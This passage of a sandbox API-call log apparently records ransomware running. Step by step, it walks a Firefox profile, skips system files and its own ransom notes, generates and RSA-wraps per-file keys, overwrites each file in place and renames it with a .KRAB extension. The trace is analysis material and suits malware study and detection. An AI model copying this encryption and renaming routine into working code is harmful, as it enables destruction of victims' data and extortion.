nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.390] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.427] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.427] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.432] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.472] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.472] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.475] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.501] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.501] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.503] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.521] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.521] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.523] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.537] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.537] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.539] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.552] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.552] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.555] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.568] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.568] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.571] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x0, lpOverlapped=0x0) returned 1 [0082.571] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0082.579] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.586] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.590] CloseHandle (hObject=0x7ec) returned 1 [0082.590] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.591] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite.krab")) returned 1 [0082.591] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.592] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.592] lstrcmpW (lpString1="pluginreg.dat", lpString2=".") returned 1 [0082.592] lstrcmpW (lpString1="pluginreg.dat", lpString2="..") returned 1 [0082.592] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat" [0082.592] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.592] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat.KRAB") returned 98 [0082.592] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0082.592] lstrlenW (lpString=".dat") returned 4 [0082.592] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.593] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".dat ") returned 5 [0082.593] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.593] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0082.593] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat") returned 93 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="desktop.ini") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="autorun.inf") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="iconcache.db") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="bootsect.bak") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="boot.ini") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat.log") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="thumbs.db") returned -1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="KRAB-DECRYPT.html") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.593] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntldr") returned 1 [0082.594] lstrcmpiW (lpString1="pluginreg.dat", lpString2="NTDETECT.COM") returned 1 [0082.594] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Bootfont.bin") returned 1 [0082.594] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.594] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0082.595] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0082.596] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.596] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.596] CryptGenRandom (in: hProv=0x1012338, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0082.596] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.596] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.597] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0082.598] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0082.598] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.599] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.599] CryptGenRandom (in: hProv=0x1012338, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0082.599] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.599] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.599] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0082.601] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0082.601] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.601] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.603] GetLastError () returned 0x0 [0082.603] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0082.603] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.603] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0082.604] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023578) returned 1 [0082.604] CryptGetKeyParam (in: hKey=0x1023578, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.604] CryptEncrypt (in: hKey=0x1023578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.605] GetLastError () returned 0x0 [0082.605] CryptDestroyKey (hKey=0x1023578) returned 1 [0082.605] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.605] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.606] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0082.606] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0082.607] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x23b, lpOverlapped=0x0) returned 1 [0082.620] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffffdc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.620] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x23b, lpOverlapped=0x0) returned 1 [0082.620] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0082.675] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.679] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.680] CloseHandle (hObject=0x7ec) returned 1 [0082.680] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.680] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\pluginreg.dat.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\pluginreg.dat.krab")) returned 1 [0082.681] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.682] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.682] lstrcmpW (lpString1="prefs.js", lpString2=".") returned 1 [0082.682] lstrcmpW (lpString1="prefs.js", lpString2="..") returned 1 [0082.682] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js" [0082.682] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.682] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js.KRAB") returned 93 [0082.682] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0082.682] lstrlenW (lpString=".js") returned 3 [0082.682] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.683] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".js ") returned 4 [0082.683] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.683] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0082.683] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js") returned 88 [0082.683] lstrcmpiW (lpString1="prefs.js", lpString2="desktop.ini") returned 1 [0082.683] lstrcmpiW (lpString1="prefs.js", lpString2="autorun.inf") returned 1 [0082.683] lstrcmpiW (lpString1="prefs.js", lpString2="ntuser.dat") returned 1 [0082.683] lstrcmpiW (lpString1="prefs.js", lpString2="iconcache.db") returned 1 [0082.683] lstrcmpiW (lpString1="prefs.js", lpString2="bootsect.bak") returned 1 [0082.683] lstrcmpiW (lpString1="prefs.js", lpString2="boot.ini") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="ntuser.dat.log") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="thumbs.db") returned -1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="KRAB-DECRYPT.html") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="ntldr") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="NTDETECT.COM") returned 1 [0082.684] lstrcmpiW (lpString1="prefs.js", lpString2="Bootfont.bin") returned 1 [0082.684] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.684] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0082.686] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0082.686] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.686] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.686] CryptGenRandom (in: hProv=0x1012338, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0082.686] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.686] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.687] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0082.688] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0082.689] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.689] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.689] CryptGenRandom (in: hProv=0x1012338, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0082.689] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.689] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.689] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0082.691] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023578) returned 1 [0082.691] CryptGetKeyParam (in: hKey=0x1023578, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.691] CryptEncrypt (in: hKey=0x1023578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.691] GetLastError () returned 0x0 [0082.691] CryptDestroyKey (hKey=0x1023578) returned 1 [0082.691] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.692] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0082.693] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1022ff8) returned 1 [0082.693] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.693] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.693] GetLastError () returned 0x0 [0082.694] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0082.694] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0082.694] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.694] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0082.695] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0082.695] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x2cc9, lpOverlapped=0x0) returned 1 [0082.729] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffd337, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.729] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2cc9, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x2cc9, lpOverlapped=0x0) returned 1 [0082.729] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0082.729] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.733] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.734] CloseHandle (hObject=0x7ec) returned 1 [0082.734] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.734] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\prefs.js"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\prefs.js.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\prefs.js.krab")) returned 1 [0082.735] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.735] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.748] lstrcmpW (lpString1="revocations.txt", lpString2=".") returned 1 [0082.748] lstrcmpW (lpString1="revocations.txt", lpString2="..") returned 1 [0082.749] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="revocations.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt" [0082.749] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.749] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt.KRAB") returned 100 [0082.749] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\revocations.txt") returned 95 [0082.749] lstrlenW (lpString=".txt") returned 4 [0082.749] VirtualAlloc (lpAddress=0x0, dwSize=0xc, 